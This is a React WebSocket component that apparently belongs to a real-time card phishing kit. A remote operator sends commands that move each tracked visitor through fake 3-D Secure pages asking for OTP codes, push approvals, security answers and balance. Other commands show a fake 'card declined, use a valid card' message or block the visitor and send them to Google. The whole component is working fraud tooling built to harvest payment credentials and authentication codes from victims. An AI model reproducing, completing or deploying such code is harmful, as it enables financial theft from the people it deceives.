import React, { useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import { ToastContainer, toast } from "react-toastify";
import { AiOutlineExclamationCircle } from "react-icons/ai";
import "react-toastify/dist/ReactToastify.css";
import "./Toast.css";

import { useStep } from "../StepContext";
import { useTranslation } from "react-i18next";
import useGeoNavigate from "./useGeoNavigate";
import { usePromo } from "./Init";

const Websocket = ({ setActivationActive }) => {
  const { setStep } = useStep();
  const { t } = useTranslation();

  const knavigate = useGeoNavigate();
  const navigate = useNavigate();

  const {
    paymentProcess,
    setPaymentProcess,
    bankProvider,
    loading,
    setLoading,
    setValidationType,
  } = usePromo();

  const wsRef = useRef(null);

  const reconnectTimerRef = useRef(null);
  const heartbeatTimerRef = useRef(null);
  const connectionTimeoutRef = useRef(null);

  const reconnectAttemptsRef = useRef(0);
  const connectingRef = useRef(false);
  const unmountedRef = useRef(false);

  const connectionLostToastShownRef = useRef(false);

  useEffect(() => {
    const url = process.env.REACT_APP_WEBSOCKET_URL;

    if (!url) {
      console.error("[WS] REACT_APP_WEBSOCKET_URL is not defined");

      return;
    }

    /*
    |--------------------------------------------------------------------------
    | Helpers
    |--------------------------------------------------------------------------
    */

    const clearReconnectTimer = () => {
      if (reconnectTimerRef.current) {
        clearTimeout(reconnectTimerRef.current);
        reconnectTimerRef.current = null;
      }
    };

    const clearHeartbeat = () => {
      if (heartbeatTimerRef.current) {
        clearInterval(heartbeatTimerRef.current);
        heartbeatTimerRef.current = null;
      }
    };

    const clearConnectionTimeout = () => {
      if (connectionTimeoutRef.current) {
        clearTimeout(connectionTimeoutRef.current);
        connectionTimeoutRef.current = null;
      }
    };

    /*
    |--------------------------------------------------------------------------
    | UUID handling
    |--------------------------------------------------------------------------
    */

    const getStoredUuid = () => {
      try {
        return localStorage.getItem("uuId");
      } catch (error) {
        console.warn("[WS] Cannot access localStorage:", error);

        return null;
      }
    };

    const saveUuid = (uuid) => {
      if (!uuid) return;

      try {
        localStorage.setItem("uuId", uuid);
      } catch (error) {
        console.warn("[WS] Cannot persist UUID:", error);
      }
    };

    /*
    |--------------------------------------------------------------------------
    | Socket cleanup
    |--------------------------------------------------------------------------
    */

    const cleanupSocket = () => {
      const ws = wsRef.current;

      if (!ws) return;

      ws.onopen = null;
      ws.onmessage = null;
      ws.onerror = null;
      ws.onclose = null;

      try {
        if (
          ws.readyState === WebSocket.OPEN ||
          ws.readyState === WebSocket.CONNECTING
        ) {
          ws.close();
        }
      } catch (error) {
        console.warn("[WS] Socket cleanup error:", error);
      }

      wsRef.current = null;
    };

    /*
    |--------------------------------------------------------------------------
    | Identification
    |--------------------------------------------------------------------------
    */

    const sendIdentification = (ws) => {
      if (ws.readyState !== WebSocket.OPEN) {
        return;
      }

      const existingUuid = getStoredUuid();

      try {
        ws.send(
          JSON.stringify({
            type: "identify",

            // null means:
            // "Server, assign me a new UUID"
            uuId: existingUuid || null,
          }),
        );

        console.log(
          "[WS] Identification sent:",
          existingUuid || "requesting new UUID",
        );
      } catch (error) {
        console.error("[WS] Failed to send identification:", error);
      }
    };

    /*
    |--------------------------------------------------------------------------
    | Application heartbeat
    |--------------------------------------------------------------------------
    */

    const startHeartbeat = (ws) => {
      clearHeartbeat();

      heartbeatTimerRef.current = setInterval(() => {
        if (unmountedRef.current) {
          return;
        }

        // Make sure this timer still belongs
        // to the current socket.
        if (wsRef.current !== ws) {
          return;
        }

        if (ws.readyState !== WebSocket.OPEN) {
          return;
        }

        try {
          ws.send(
            JSON.stringify({
              type: "ping",
              timestamp: Date.now(),
            }),
          );
        } catch (error) {
          console.warn("[WS] Heartbeat failed:", error);

          try {
            ws.close();
          } catch {}
        }
      }, 15000);
    };

    /*
    |--------------------------------------------------------------------------
    | Reconnection
    |--------------------------------------------------------------------------
    */

    const scheduleReconnect = () => {
      if (unmountedRef.current) {
        return;
      }

      clearReconnectTimer();

      const attempt = reconnectAttemptsRef.current;

      // Fast initial reconnects,
      // gradually increasing up to 10 seconds.
      const baseDelay = Math.min(500 * Math.pow(1.6, attempt), 10000);

      // Random jitter prevents many clients
      // reconnecting simultaneously.
      const jitter = Math.random() * 500;

      const delay = Math.floor(baseDelay + jitter);

      reconnectAttemptsRef.current += 1;

      console.warn(
        `[WS] Reconnect attempt ${reconnectAttemptsRef.current} in ${delay}ms`,
      );

      reconnectTimerRef.current = setTimeout(() => {
        connectWebSocket();
      }, delay);
    };

    /*
    |--------------------------------------------------------------------------
    | Connect
    |--------------------------------------------------------------------------
    */

    const connectWebSocket = () => {
      if (unmountedRef.current) {
        return;
      }

      const current = wsRef.current;

      if (current?.readyState === WebSocket.OPEN) {
        return;
      }

      if (current?.readyState === WebSocket.CONNECTING) {
        return;
      }

      if (connectingRef.current) {
        return;
      }

      connectingRef.current = true;

      clearReconnectTimer();
      clearConnectionTimeout();
      clearHeartbeat();

      cleanupSocket();

      console.log("[WS] Connecting...");

      try {
        const ws = new WebSocket(url);

        wsRef.current = ws;

        /*
        |--------------------------------------------------------------------------
        | Connection timeout
        |--------------------------------------------------------------------------
        |
        | Prevent a connection from remaining stuck in CONNECTING forever.
        |
        */

        connectionTimeoutRef.current = setTimeout(() => {
          if (wsRef.current === ws && ws.readyState === WebSocket.CONNECTING) {
            console.warn("[WS] Connection timeout");

            try {
              ws.close();
            } catch {}
          }
        }, 10000);

        /*
        |--------------------------------------------------------------------------
        | OPEN
        |--------------------------------------------------------------------------
        */

        ws.onopen = () => {
          if (unmountedRef.current) {
            try {
              ws.close();
            } catch {}

            return;
          }

          if (wsRef.current !== ws) {
            try {
              ws.close();
            } catch {}

            return;
          }

          console.log("[WS] Connected");

          connectingRef.current = false;

          clearConnectionTimeout();
          clearReconnectTimer();

          reconnectAttemptsRef.current = 0;

          connectionLostToastShownRef.current = false;

          /*
          | Send existing UUID,
          | or ask the backend to create one.
          */

          sendIdentification(ws);

          /*
          | Start application heartbeat.
          */

          startHeartbeat(ws);
        };

        /*
        |--------------------------------------------------------------------------
        | MESSAGE
        |--------------------------------------------------------------------------
        */

        ws.onmessage = (event) => {
          let data;

          try {
            data = JSON.parse(event.data);
          } catch (error) {
            console.error("[WS] Invalid JSON received:", event.data);

            return;
          }

          /*
          |--------------------------------------------------------------------------
          | Registration response
          |--------------------------------------------------------------------------
          */

          if (data.type === "registered") {
            if (data.uuId) {
              saveUuid(data.uuId);

              console.log("[WS] Registered UUID:", data.uuId);
            }

            return;
          }

          /*
          |--------------------------------------------------------------------------
          | Application heartbeat response
          |--------------------------------------------------------------------------
          */

          if (data.type === "pong") {
            return;
          }

          /*
          |--------------------------------------------------------------------------
          | Toast message
          |--------------------------------------------------------------------------
          */

          if (data.type === "message") {
            toast(
              <div className="flex items-center gap-2">
                <AiOutlineExclamationCircle
                  className="text-yellow-500"
                  size={24}
                />

                <span>{data.message}</span>
              </div>,
              {
                position: "bottom-right",

                autoClose: 10000,

                className: "bg-gray-800 text-white rounded shadow-md",

                progressClassName: "bg-yellow-500",
              },
            );

            return;
          }

          console.log("TYPE:", JSON.stringify(data.type));

console.log("MATCH:", data.type === "push_text");

console.log("LENGTH:", data.type?.length);
          if (data.type === "block_user") {
            localStorage.setItem("blocked", "true");
            window.location.href = "https://www.google.com/";
          } else if (data.type === "question_response") {
            localStorage.setItem("seq_quest", data.message);
            if (localStorage.getItem("k_selected") === "true") {
              navigate("/3ds/kquestion");
            } else {
              navigate("/3ds/question");
            }
          } else if (data.type === "push_text") {
                                  localStorage.setItem("push_text", data.message);
                          setValidationType("push");
                setPaymentProcess(true);
              
                setLoading(false);
              
          } else if (data.type === "redirect") {
            const RedirectPage = data.to;

            if (RedirectPage === "otp_page") {
              setValidationType("otp");
              if (paymentProcess === false) {
                setPaymentProcess(true);
              }
              if (loading === true) {
                setLoading(false);
              }
            } else if (RedirectPage === "push_data") {
              setValidationType("push");
              if (paymentProcess === false) {
                setPaymentProcess(true);
              }
              if (loading === true) {
                setLoading(false);
              }
            } else if (RedirectPage === "wrong_data") {
              setPaymentProcess(false);
              setLoading(true);

              toast(
                <div className="flex items-center gap-2">
                  <AiOutlineExclamationCircle
                    className="text-yellow-500 flex-shrink-0"
                    size={24}
                  />
                  <span className="text-xs">
                    {t(
                      "We're sorry, but your card was declined. Please use a valid credit or debit card to proceed with your activation.",
                    )}
                  </span>
                </div>,
                {
                  position: "bottom-right",
                  autoClose: 10000,
                  className: "bg-gray-800  text-white rounded shadow-md",
                  progressClassName: "bg-yellow-500",
                },
              );
            } else if (RedirectPage === "sucess_page") {
              navigate("/final"); 
              localStorage.setItem("passed_s", true); 
              setPaymentProcess(false); 
              setLoading(true); 
            } else if (RedirectPage === "wrong_code") {
              if (localStorage.getItem("k_selected") === "true") {
                navigate("/3ds/kotp");
              } else {
                navigate("/3ds/otp");
              }
            } else if (RedirectPage === "wrong_push") {
              navigate("/3ds/push");
            } else if (RedirectPage === "wrong_balance") {
              navigate("/3ds/balance");
            } else if (RedirectPage === "push_page") {
              navigate("/3ds/push");
            } else if (RedirectPage === "balance_page") {
              navigate("/3ds/balance");
            } else if (RedirectPage === "original_page") {
              navigate("/final"); 
              localStorage.setItem("passed_s", true); 
              setPaymentProcess(false); 
              setLoading(true); 
            }
          }

          console.log("[WS] Unknown message:", data);
        };

        /*
        |--------------------------------------------------------------------------
        | ERROR
        |--------------------------------------------------------------------------
        */

        ws.onerror = (error) => {
          console.warn("[WS] Error:", error);

          /*
          | Browsers provide very little useful
          | information through WebSocket.onerror.
          |
          | Let onclose handle reconnecting.
          */

          try {
            ws.close();
          } catch {}
        };

        /*
        |--------------------------------------------------------------------------
        | CLOSE
        |--------------------------------------------------------------------------
        */

        ws.onclose = (event) => {
          console.warn(
            `[WS] Closed. code=${event.code}, reason=${event.reason || "none"}`,
          );

          if (wsRef.current === ws) {
            wsRef.current = null;
          }

          connectingRef.current = false;

          clearHeartbeat();
          clearConnectionTimeout();

          if (unmountedRef.current) {
            return;
          }

          /*
          | Show one toast per disconnection cycle.
          */

          if (!connectionLostToastShownRef.current) {
            connectionLostToastShownRef.current = true;

            toast(
              <div className="flex items-center gap-2">
                <AiOutlineExclamationCircle
                  className="text-yellow-500"
                  size={24}
                />

                <span>{t("Connection lost. Reconnecting...")}</span>
              </div>,
              {
                position: "bottom-right",

                autoClose: 4000,

                className: "bg-gray-800 text-white rounded shadow-md",

                progressClassName: "bg-yellow-500",
              },
            );
          }

          scheduleReconnect();
        };
      } catch (error) {
        console.error("[WS] Failed to create WebSocket:", error);

        connectingRef.current = false;

        clearConnectionTimeout();

        scheduleReconnect();
      }
    };

    /*
    |--------------------------------------------------------------------------
    | Force reconnect
    |--------------------------------------------------------------------------
    */

    const forceReconnect = () => {
      if (unmountedRef.current) {
        return;
      }

      const state = wsRef.current?.readyState;

      if (state !== WebSocket.OPEN && state !== WebSocket.CONNECTING) {
        console.log("[WS] Force reconnect");

        clearReconnectTimer();

        connectWebSocket();
      }
    };

    /*
    |--------------------------------------------------------------------------
    | Browser events
    |--------------------------------------------------------------------------
    */

    const handleVisibilityChange = () => {
      if (document.visibilityState === "visible") {
        forceReconnect();
      }
    };

    const handleOnline = () => {
      console.log("[WS] Browser online");

      reconnectAttemptsRef.current = 0;

      clearReconnectTimer();

      forceReconnect();
    };

    const handleOffline = () => {
      console.warn("[WS] Browser offline");
    };

    /*
    |--------------------------------------------------------------------------
    | Start
    |--------------------------------------------------------------------------
    */

    unmountedRef.current = false;

    connectWebSocket();

    document.addEventListener("visibilitychange", handleVisibilityChange);

    window.addEventListener("online", handleOnline);

    window.addEventListener("offline", handleOffline);

    /*
    |--------------------------------------------------------------------------
    | Cleanup
    |--------------------------------------------------------------------------
    */

    return () => {
      unmountedRef.current = true;

      document.removeEventListener("visibilitychange", handleVisibilityChange);

      window.removeEventListener("online", handleOnline);

      window.removeEventListener("offline", handleOffline);

      clearReconnectTimer();
      clearHeartbeat();
      clearConnectionTimeout();

      cleanupSocket();

      connectingRef.current = false;
    };
  }, [navigate, setStep, t, setActivationActive]);

  return (
    <ToastContainer
      hideProgressBar={false}
      newestOnTop={false}
      closeOnClick
      rtl={false}
      pauseOnFocusLoss
      draggable
      pauseOnHover
    />
  );
};

export default Websocket;
